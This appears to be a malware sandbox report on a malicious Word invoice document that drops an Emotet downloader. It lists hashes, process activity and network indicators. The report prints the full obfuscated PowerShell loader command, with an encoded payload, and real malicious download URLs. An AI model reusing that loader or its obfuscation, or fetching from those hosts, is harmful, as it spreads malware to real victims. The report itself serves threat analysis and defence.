analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FACTURE-5M85864038.doc

Full analysis: https://app.any.run/tasks/96281518-402c-44aa-a9c2-64c45dc44277
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 15, 2018, 21:35:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Avery-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 11:39:00 2018, Last Saved Time/Date: Wed Nov 7 11:39:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

9F207701D027839657FE4BB0BE9BB7D3

SHA1:

6F9BDA040BB8B2DD7EBED54D068698A927ED8BA1

SHA256:

03728E25298349487FBDFE05C773C6C708CAA5426F22762A4A11D5D0F7C41A82

SSDEEP:

768:8LwVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9/isfNXM3rHKS/:80ocn1kp59gxBK85fBt+a9dO2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3168)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3168)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 4024)
    • Creates files in the user directory

      • powershell.exe (PID: 2724)
      • filezilla.exe (PID: 3452)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3168)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3168)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Avery-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:07 11:39:00
ModifyDate: 2018:11:07 11:39:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe filezilla.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3168"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FACTURE-5M85864038.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
4024CMD C:\wINdows\systEM32\cMd /c "SEt KQI= (nEW-oBJecT SySTem.Io.StReaMReaDEr( ( nEW-oBJecT io.cOMPReSsion.DeFLAtEStReAm([iO.MEmORYstrEAm] [SyStEm.CONVeRT]::fROMBASe64STRing( 'PZBba8JAEIX/Sh4W1mDdVLBaXAK2FS8t2IpILfQlyY5mc9lJ48TYhvz3JlL7Ouc7H5xh0WbqGih76EcQkLUCEu/gPyUaDEk22ymXh0TZ2HF8jQRHEgEKrZyzWr3Ny9G6P/mL4yKNU98zqjCHhkmdWbZ4SdV+dwUIgtBgiahaRQzOcA63D/Hzqb++IgbwkGORCY3OcAuLox++/td1dswx9Iy+2DH5+hgNBlxsskRTh0+4Ldl2rS3X4vd3Ay4ZPZYuA3MaE6RZl3/ybpt3uYAzcLnHHLwg7LDoZ2VpY7VT7Yry74o1LxFTLE2CnprpBC7MjdUKbbk0J4yht2ykl4v0G08s68CjIKzq+hc=' ), [syStEM.iO.ComPReSsION.cOMPRESsIonMODe]::DeCoMPreSs) ) ,[TeXt.enCOdINg]::AsCII) ).REAdtOEnD( ) ^|^&( ([strIng]$verBOsEpreFeRence)[1,3]+'X'-JoiN'')&& PoWErshELL ^& ( \"{0}{1}\" -f'SET-ItE','m' ) ('Va' +'RI'+ 'AbLE:jW1V') ( [tYpE](\"{1}{0}{2}\" -f'nVi','E','rONMENT') ) ; ^&( ${En`V:`comS`PeC}[4,24,25]-join'' )( ( ( . ( \"{1}{0}{2}{3}\" -f'-ch','gEt','IlDiT','EM' ) ( 'vA' + 'rI'+'aBle:jW1v' ) ).VALue::( \"{3}{0}{1}{4}{6}{5}{2}\" -f 'Vir','On','BlE','gEten','Me','vaRIa','NT' ).Invoke( 'kqi',( \"{0}{2}{1}\" -f 'pro','sS','CE' ) ) ) )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2724PoWErshELL & ( \"{0}{1}\" -f'SET-ItE','m' ) ('Va' +'RI'+ 'AbLE:jW1V') ( [tYpE](\"{1}{0}{2}\" -f'nVi','E','rONMENT') ) ; &( ${En`V:`comS`PeC}[4,24,25]-join'' )( ( ( . ( \"{1}{0}{2}{3}\" -f'-ch','gEt','IlDiT','EM' ) ( 'vA' + 'rI'+'aBle:jW1v' ) ).VALue::( \"{3}{0}{1}{4}{6}{5}{2}\" -f 'Vir','On','BlE','gEten','Me','vaRIa','NT' ).Invoke( 'kqi',( \"{0}{2}{1}\" -f 'pro','sS','CE' ) ) ) )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3452"C:\Program Files\FileZilla FTP Client\filezilla.exe" C:\Program Files\FileZilla FTP Client\filezilla.exeexplorer.exe
User:
admin
Company:
FileZilla Project
Integrity Level:
MEDIUM
Description:
FileZilla FTP Client
Exit code:
0
Version:
3, 36, 0, 0
Total events
1 823
Read events
1 414
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
3
Unknown types
2

Dropped files

PID
Process
Filename
Type
3168WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B1C.tmp.cvr
MD5:
SHA256:
2724powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QJ6GZ2MB35EJM7M0RGD9.temp
MD5:
SHA256:
3168WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF12EB02664154A3D1.TMP
MD5:
SHA256:
3168WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A806A50-253B-47D3-9214-724458C84156}.tmp
MD5:
SHA256:
3168WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3EAFDE96-0247-490E-9C55-01F13832E326}.tmp
MD5:
SHA256:
3452filezilla.exeC:\Users\admin\AppData\Roaming\FileZilla\layout.xml~
MD5:
SHA256:
3452filezilla.exeC:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml~
MD5:
SHA256:
3168WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7D4D8D3DE0BF9CE4B4722341BAE1F534
SHA256:A6D15CFA4F2F5FA87B978C0B3606BE155DB0DF3BB3F5E5D852B4AC4F84816854
2724powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a2ad.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3452filezilla.exeC:\Users\admin\AppData\Roaming\FileZilla\filezilla.xmlxml
MD5:90F43C057C9B31BE9D16384C16C6C1FC
SHA256:62979581B4BC7ED5CBD4F2A8E1B407F999981BFB3875747BE3E30784A25381A3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2724
powershell.exe
GET
404
67.205.13.49:80
http://biotest.co.id/xdNPGw7Q1
US
html
326 b
malicious
2724
powershell.exe
GET
500
108.179.232.15:80
http://technowood.co.ke/6Ge0AkJv1Q
US
html
753 b
malicious
2724
powershell.exe
GET
404
103.47.192.41:80
http://neogroup.io/6UeHsbhO
VN
html
325 b
malicious
2724
powershell.exe
GET
500
103.66.86.36:80
http://kumkmbandung.com/FpHKmdfX
ID
html
7.14 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2724
powershell.exe
67.205.13.49:80
biotest.co.id
New Dream Network, LLC
US
malicious
2724
powershell.exe
108.179.232.15:80
technowood.co.ke
CyrusOne LLC
US
malicious
2724
powershell.exe
103.66.86.36:80
kumkmbandung.com
CV. INDONETMEDIA CORPORATION
ID
malicious
2724
powershell.exe
103.47.192.41:80
neogroup.io
The Corporation for Financing & Promoting Technology
VN
malicious

DNS requests

Domain
IP
Reputation
biotest.co.id
  • 67.205.13.49
malicious
kumkmbandung.com
  • 103.66.86.36
malicious
technowood.co.ke
  • 108.179.232.15
malicious
neogroup.io
  • 103.47.192.41
malicious
tipsrohani.com
malicious

Threats

PID
Process
Class
Message
2724
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2724
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2724
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2724
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
No debug info